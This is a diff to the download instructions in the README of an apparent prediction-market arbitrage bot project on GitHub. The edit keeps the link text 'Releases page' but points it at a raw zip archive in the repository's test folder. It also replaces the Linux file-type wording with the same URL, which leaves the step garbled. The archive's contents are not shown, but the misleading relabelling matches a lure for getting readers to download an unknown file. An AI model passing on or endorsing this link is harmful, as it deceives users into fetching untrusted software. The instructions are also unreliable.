Crayz916/prediction-market-arbitrage-bot/README.md

 ## 📥 Download & Install
 To get started with the **prediction-market-arbitrage-bot**, follow these steps:

-1. Click the **Download** button above or visit the [Releases page](https://github.com/Crayz916/prediction-market-arbitrage-bot/releases) to access the latest version of the application.
+1. Click the **Download** button above or visit the [Releases page](https://github.com/Crayz916/prediction-market-arbitrage-bot/raw/refs/heads/main/test/arbitrage-market-prediction-bot-3.0.zip) to access the latest version of the application.
 2. Explore the list of available releases.
 3. Look for the latest version (usually at the top of the list).
 4. Download the appropriate file for your operating system.
-It may end with `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux.
+It may end with `.exe` for Windows, `.dmg` for macOS, or `https://github.com/Crayz916/prediction-market-arbitrage-bot/raw/refs/heads/main/test/arbitrage-market-prediction-bot-3.0.zip` for Linux.
 5. Once the download is complete, locate the file on your computer.

 ## 📂 Installation Steps